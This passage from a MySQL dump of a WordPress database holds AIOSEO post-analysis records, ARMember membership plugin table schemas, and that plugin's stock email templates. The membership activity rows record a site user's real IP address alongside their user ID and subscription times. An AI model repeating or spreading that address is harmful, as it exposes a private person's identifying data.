short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 100 in the test, which is considered very easy to read.\",\"score\":9,\"maxScore\":9,\"error\":0},\"errors\":1}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,68,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-03-03 09:56:32','2022-03-03 09:56:32'),(84,1194,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-03-07 07:30:30','2022-03-07 07:30:30'),(85,1204,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is over 160 characters.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"You are linking to other resources on your website which is great.\",\"score\":9,\"maxScore\":9,\"error\":0},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":3},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"Great job!\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 61.6 in the test, which is considered ok to read.\",\"score\":9,\"maxScore\":9,\"error\":0},\"errors\":1}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,75,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-03-09 07:02:23','2022-03-10 06:27:22'),(86,1159,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-03-11 10:50:38','2022-03-11 10:50:38');
/*!40000 ALTER TABLE `wp_aioseo_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_androapp_stats`
--

DROP TABLE IF EXISTS `wp_androapp_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_androapp_stats` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` text DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `eligible` int(11) DEFAULT 0,
  `ios_eligible` int(11) DEFAULT 0,
  `success` int(11) DEFAULT 0,
  `notRegistered` int(11) DEFAULT 0,
  `mismatchsenderid` int(11) DEFAULT 0,
  `other` int(11) DEFAULT 0,
  `status` varchar(60) DEFAULT 'START',
  `ios_bulk_sent` int(11) DEFAULT 0,
  `ios_sent` int(11) DEFAULT 0,
  `ios_notRegistered` int(11) DEFAULT 0,
  `bulk_sent` int(11) DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_androapp_stats`
--

LOCK TABLES `wp_androapp_stats` WRITE;
/*!40000 ALTER TABLE `wp_androapp_stats` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_androapp_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_activity`
--

DROP TABLE IF EXISTS `wp_arm_activity`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_activity` (
  `arm_activity_id` int(11) NOT NULL AUTO_INCREMENT,
  `arm_user_id` bigint(20) NOT NULL DEFAULT 0,
  `arm_type` varchar(50) NOT NULL,
  `arm_action` varchar(50) NOT NULL,
  `arm_content` longtext NOT NULL,
  `arm_item_id` bigint(20) NOT NULL DEFAULT 0,
  `arm_paid_post_id` bigint(20) NOT NULL DEFAULT 0,
  `arm_gift_plan_id` bigint(20) NOT NULL DEFAULT 0,
  `arm_link` varchar(255) DEFAULT NULL,
  `arm_activity_plan_name` varchar(255) DEFAULT NULL,
  `arm_activity_plan_type` varchar(255) DEFAULT NULL,
  `arm_activity_payment_gateway` varchar(255) DEFAULT NULL,
  `arm_activity_plan_amount` double NOT NULL DEFAULT 0,
  `arm_activity_plan_start_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  `arm_activity_plan_end_date` datetime DEFAULT '1970-01-01 00:00:00',
  `arm_activity_plan_next_cycle_date` datetime DEFAULT '1970-01-01 00:00:00',
  `arm_ip_address` varchar(50) NOT NULL,
  `arm_date_recorded` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  PRIMARY KEY (`arm_activity_id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_activity`
--

LOCK TABLES `wp_arm_activity` WRITE;
/*!40000 ALTER TABLE `wp_arm_activity` DISABLE KEYS */;
INSERT INTO `wp_arm_activity` VALUES (1,31,'membership','new_subscription','a:15:{s:12:\"current_user\";i:31;s:7:\"plan_id\";s:1:\"1\";s:9:\"action_by\";s:0:\"\";s:9:\"plan_name\";s:15:\"Free Membership\";s:11:\"plan_amount\";s:4:\"0.00\";s:9:\"plan_type\";s:4:\"free\";s:17:\"plan_payment_type\";s:0:\"\";s:9:\"plan_text\";s:4:\"Free\";s:11:\"plan_detail\";a:13:{s:24:\"arm_subscription_plan_id\";s:1:\"1\";s:26:\"arm_subscription_plan_name\";s:15:\"Free Membership\";s:33:\"arm_subscription_plan_description\";s:29:\"This is Free Membership Plan.\";s:26:\"arm_subscription_plan_type\";s:4:\"free\";s:29:\"arm_subscription_plan_options\";s:45:\"a:1:{s:9:\"pricetext\";s:15:\"Free Membership\";}\";s:28:\"arm_subscription_plan_amount\";s:1:\"0\";s:28:\"arm_subscription_plan_status\";s:1:\"1\";s:26:\"arm_subscription_plan_role\";s:8:\"armember\";s:29:\"arm_subscription_plan_post_id\";s:1:\"0\";s:33:\"arm_subscription_plan_gift_status\";s:1:\"0\";s:31:\"arm_subscription_plan_is_delete\";s:1:\"0\";s:34:\"arm_subscription_plan_created_date\";s:19:\"2023-03-28 07:20:22\";s:31:\"arm_user_selected_payment_cycle\";s:0:\"\";}s:20:\"arm_subscr_effective\";s:0:\"\";s:18:\"arm_change_plan_to\";s:0:\"\";s:5:\"start\";i:1680008433;s:6:\"expire\";s:0:\"\";s:7:\"gateway\";s:6:\"manual\";s:12:\"payment_data\";a:0:{}}',1,0,0,'',NULL,NULL,NULL,0,'1970-01-01 00:00:00','1970-01-01 00:00:00','1970-01-01 00:00:00','171.76.80.77','2023-03-28 07:30:33'),(2,31,'membership','renew_subscription','a:15:{s:12:\"current_user\";i:31;s:7:\"plan_id\";i:1;s:9:\"action_by\";s:0:\"\";s:9:\"plan_name\";s:15:\"Free Membership\";s:11:\"plan_amount\";s:4:\"0.00\";s:9:\"plan_type\";s:4:\"free\";s:17:\"plan_payment_type\";s:0:\"\";s:9:\"plan_text\";s:4:\"Free\";s:11:\"plan_detail\";a:13:{s:24:\"arm_subscription_plan_id\";s:1:\"1\";s:26:\"arm_subscription_plan_name\";s:15:\"Free Membership\";s:33:\"arm_subscription_plan_description\";s:29:\"This is Free Membership Plan.\";s:26:\"arm_subscription_plan_type\";s:4:\"free\";s:29:\"arm_subscription_plan_options\";s:45:\"a:1:{s:9:\"pricetext\";s:15:\"Free Membership\";}\";s:28:\"arm_subscription_plan_amount\";s:1:\"0\";s:28:\"arm_subscription_plan_status\";s:1:\"1\";s:26:\"arm_subscription_plan_role\";s:8:\"armember\";s:29:\"arm_subscription_plan_post_id\";s:1:\"0\";s:33:\"arm_subscription_plan_gift_status\";s:1:\"0\";s:31:\"arm_subscription_plan_is_delete\";s:1:\"0\";s:34:\"arm_subscription_plan_created_date\";s:19:\"2023-03-28 07:20:22\";s:31:\"arm_user_selected_payment_cycle\";s:0:\"\";}s:20:\"arm_subscr_effective\";s:0:\"\";s:18:\"arm_change_plan_to\";s:0:\"\";s:5:\"start\";i:1680008492;s:6:\"expire\";s:0:\"\";s:7:\"gateway\";s:6:\"manual\";s:12:\"payment_data\";a:0:{}}',1,0,0,'',NULL,NULL,NULL,0,'1970-01-01 00:00:00','1970-01-01 00:00:00','1970-01-01 00:00:00','171.76.80.77','2023-03-28 07:31:32');
/*!40000 ALTER TABLE `wp_arm_activity` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_debug_general_log`
--

DROP TABLE IF EXISTS `wp_arm_debug_general_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_debug_general_log` (
  `arm_general_log_id` int(11) NOT NULL AUTO_INCREMENT,
  `arm_general_log_event` varchar(255) DEFAULT NULL,
  `arm_general_log_event_name` varchar(255) DEFAULT NULL,
  `arm_general_log_event_from` varchar(255) DEFAULT NULL,
  `arm_general_log_raw_data` text DEFAULT NULL,
  `arm_general_log_added_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  PRIMARY KEY (`arm_general_log_id`),
  KEY `arm-debug-general-log-event` (`arm_general_log_event`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_debug_general_log`
--

LOCK TABLES `wp_arm_debug_general_log` WRITE;
/*!40000 ALTER TABLE `wp_arm_debug_general_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_arm_debug_general_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_debug_payment_log`
--

DROP TABLE IF EXISTS `wp_arm_debug_payment_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_debug_payment_log` (
  `arm_payment_log_id` int(11) NOT NULL AUTO_INCREMENT,
  `arm_payment_log_ref_id` int(11) NOT NULL DEFAULT 0,
  `arm_payment_log_gateway` varchar(255) DEFAULT NULL,
  `arm_payment_log_event` varchar(255) DEFAULT NULL,
  `arm_payment_log_event_from` varchar(255) DEFAULT NULL,
  `arm_payment_log_status` tinyint(1) DEFAULT 1,
  `arm_payment_log_raw_data` text DEFAULT NULL,
  `arm_payment_log_added_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  PRIMARY KEY (`arm_payment_log_id`),
  KEY `arm-debug-payment-log-gateway` (`arm_payment_log_gateway`),
  KEY `arm-debug-payment-log-status` (`arm_payment_log_status`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_debug_payment_log`
--

LOCK TABLES `wp_arm_debug_payment_log` WRITE;
/*!40000 ALTER TABLE `wp_arm_debug_payment_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_arm_debug_payment_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_email_templates`
--

DROP TABLE IF EXISTS `wp_arm_email_templates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_email_templates` (
  `arm_template_id` int(11) NOT NULL AUTO_INCREMENT,
  `arm_template_name` varchar(255) NOT NULL,
  `arm_template_slug` varchar(255) NOT NULL,
  `arm_template_subject` varchar(255) NOT NULL,
  `arm_template_content` longtext NOT NULL,
  `arm_template_status` int(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`arm_template_id`)
) ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_email_templates`
--

LOCK TABLES `wp_arm_email_templates` WRITE;
/*!40000 ALTER TABLE `wp_arm_email_templates` DISABLE KEYS */;
INSERT INTO `wp_arm_email_templates` VALUES (1,'Signup Completed Notification To Admin','new-reg-user-admin','New user registration at {ARM_BLOGNAME}','<p>Hello Administrator,</p><br><p>A new user has just registered at {ARM_BLOGNAME}. Here are some basic details of that newly registered user.</p><br><p>Firstname: {ARM_FIRST_NAME}</p><br><p>Lastname: {ARM_LAST_NAME}</p><br><p>Username: {ARM_USERNAME}</p><br><p>Email: {ARM_EMAIL}</p><br><p>To check further details of this user, please click on the following link:</p><br><p>{ARM_PROFILE_LINK}</p><br><br><p>Thank You</p><br><p>{ARM_BLOGNAME}</p>',1),(2,'Signup Completed (With Payment) Notification To User','new-reg-user-with-payment','Confirmation of your membership at {ARM_BLOGNAME}','<p>Hi {ARM_FIRST_NAME} {ARM_LAST_NAME},</p><br><p>Thank you for subscribing to the {ARM_PLAN} at {ARM_BLOGNAME}.</p><br><p>You can review and edit your membership details here:</p><br><p>{ARM_PROFILE_LINK}</p><br><p>Here is your latest payment information:</p><br><p>Paid With: {ARM_PAYMENT_GATEWAY}</p><br><p>Plan Name: {ARM_PLAN}</p><br><p>Plan Type: {ARM_PAYMENT_TYPE}</p><br><p>Amount: {ARM_PLAN_AMOUNT}</p><br><p>Transaction Id: {ARM_TRANSACTION_ID}</p><br><p>Have a nice day!</p>',1),(3,'Signup Completed (Without Payment) Notification To User','new-reg-user-without-payment','Confirmation of your membership at {ARM_BLOGNAME}','<p>Hi {ARM_FIRST_NAME} {ARM_LAST_NAME},</p><br><p>Thank you for subscribing to the {ARM_PLAN} at {ARM_BLOGNAME}.</p><br><p>You can review and edit your membership details here:</p><br><p>{ARM_PROFILE_LINK}</p><br><p>Have a nice day!</p>',1),(4,'Email Verification','email-verify-user','Email verification at {ARM_BLOGNAME}','<p>Hi {ARM_FIRST_NAME} {ARM_LAST_NAME},</p><br><p>You must confirm/validate your email account before logging in.</p><br><p>Please click on the following link to  activate your account:</p><br><p>{ARM_VALIDATE_URL}</p><br><p>Have a nice day!</p>',1),(5,'Email Verified','account-verified-user','Email verified successfully at {ARM_BLOGNAME}','<p>Hi {ARM_FIRST_NAME} {ARM_LAST_NAME},</p><br><p>Your account is now verified at {ARM_BLOGNAME}.</p><br><p>Have a nice day!</p>',1),(6,'Change Password','change-password-user','Your password has been changed at {ARM_BLOGNAME}','<p>Hi {ARM_FIRST_NAME} {ARM_LAST_NAME},</p><br><p>Your Password has been changed.</p><br><p>To login please fill out your credentials on:</p><br><p>{ARM_LOGIN_URL}</p><br><p>Your Username: {ARM_USERNAME}</p><br><p>Have a nice day!</p>',1),(7,'Forgot Password','forgot-passowrd-user','Reset password request at {ARM_BLOGNAME}','<p>Hi {ARM_FIRST_NAME} {ARM_LAST_NAME},</p><br><p>Someone requested that the password be reset for the following account: {ARM_BLOG_URL}</p><br><p>Username: {ARM_USERNAME},</p><br><p>If this was a mistake, just ignore this email and nothing will happen.</p><br><p>To reset your password, visit the following address:{ARM_RESET_PASSWORD_LINK}</p><br><p>If you have any problems, please contact us at {ARM_ADMIN_EMAIL}.</p>',1),(8,'Profile Updated','profile-updated-user','Your account has been updated at {ARM_BLOGNAME}','<p>Hi {ARM_FIRST_NAME} {ARM_LAST_NAME},</p><br><p>Your account has been updated.</p><br><p>To visit your profile page follow the next link:</p><br>\r\n				<p>{ARM_PROFILE_LINK}</p><br><p>Have a nice day!</p>',1),(9,'Profile Updated Notification To Admin','profile-updated-notification-admin','Account of {ARM_USERNAME} has been updated at {ARM_BLOGNAME}','<p>Hello Administrator,</p><br><p>An account has been updated at {ARM_BLOGNAME}. Here are some basic details of that updated user.</p><br><p>Firstname: {ARM_FIRST_NAME}</p><br><p>Lastname: {ARM_LAST_NAME}</p><br><p>Username: {ARM_USERNAME}</p><br><p>Email: {ARM_EMAIL}</p><br><br><p>Thank You</p><br><p>Have a nice day!</p>',1),(10,'Grace Period For Failed Payment','grace-failed-payment','Reminder for failed payment at {ARM_BLOGNAME}','<p>Hi {ARM_FIRST_NAME} {ARM_LAST_NAME},</p><br><p>Unfortunately your recurring payment for {ARM_PLAN} at {ARM_BLOGNAME} has not succeeded for some reason.</p><br><p>Here are some payment details:</p><br><p>Paid With: {ARM_PAYMENT_GATEWAY}</p><br><p>Amount: {ARM_PLAN_AMOUNT}</p><br><p>Please contact the payment service provider about this.</p><br><p><strong>Note: </strong>If you do not take appropriate action within {ARM_GRACE_PERIOD_DAYS} days, than any current membership may lapse.</p><br><p>If you have any further queries, feel free to contact us at {ARM_BLOGNAME}</p><br><p>Have a nice day!</p>',1),(11,'User Enters Grace Period Notification','grace-eot','Reminder for membership expiration at {ARM_BLOGNAME}','<p>Hi {ARM_FIRST_NAME} {ARM_LAST_NAME},</p><br><p>Your {ARM_PLAN} membership has just expired.</p><br><p>But you can still access our website without any problem,</p><br><p>If you want to renew/update your membership plan, than please click on the following link:</p><br><p>{ARM_BLOG_URL}</p><br><p><strong>Note: </strong>If you do not renew/change your membership within {ARM_GRACE_PERIOD_DAYS} days, than the relevant action will be performed by system.</p><br><p>Have a nice day!</p>',1),(12,'Failed Payment Notification To Admin','failed-payment-admin','Reminder for failed payment at {ARM_BLOGNAME}','<p>Hello Administrator,</p><br><p>This is a reminder that the following member\'s recurring payment for {ARM_PLAN} membership has failed for some reason at {ARM_BLOGNAME}</p><br><p>Here are some details.</p><br><p>Username: {ARM_USERNAME}</p><br><p>Email: {ARM_EMAIL}</p><br><p>Paid With: {ARM_PAYMENT_GATEWAY}</p><br><p>Amount: {ARM_PLAN_AMOUNT}</p><br><p>Please take appropriate action.</p><br><p>Thank You.</p><br>',1),(13,'Manual User Activation','on-menual-activation','Your account has been activated at {ARM_BLOGNAME}','<p>Hi {ARM_FIRST_NAME} {ARM_LAST_NAME},</p><br><p>Your Account has been activated.</p><br><p> Please click on the following link:</p><br><p>{ARM_BLOG_URL}</p><br><p>Have a nice day!</p>',1);
/*!40000 ALTER TABLE `wp_arm_email_templates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_entries`
--

DROP TABLE IF EXISTS `wp_arm_entries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_entries` (
  `arm_entry_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `arm_entry_email` varchar(255) DEFAULT NULL,
  `arm_name` varchar(255) DEFAULT NULL,
  `arm_description` longtext DEFAULT NULL,
  `arm_ip_address` text DEFAULT NULL,
  `arm_browser_info` text DEFAULT NULL,
  `arm_entry_value` longtext DEFAULT NULL,
  `arm_form_id` int(11) DEFAULT NULL,
  `arm_user_id` bigint(20) DEFAULT NULL,
  `arm_plan_id` int(11) DEFAULT NULL,
  `arm_is_post_entry` tinyint(1) NOT NULL DEFAULT 0,
  `arm_paid_post_id` bigint(20) NOT NULL DEFAULT 0,
  `arm_is_gift_entry` tinyint(1) NOT NULL DEFAULT 0,
  `arm_created_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  PRIMARY KEY (`arm_entry_id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_entries`
--

LOCK TABLES `wp_arm_entries` WRITE;
/*!40000 ALTER TABLE `wp_arm_entries` DISABLE KEYS */;
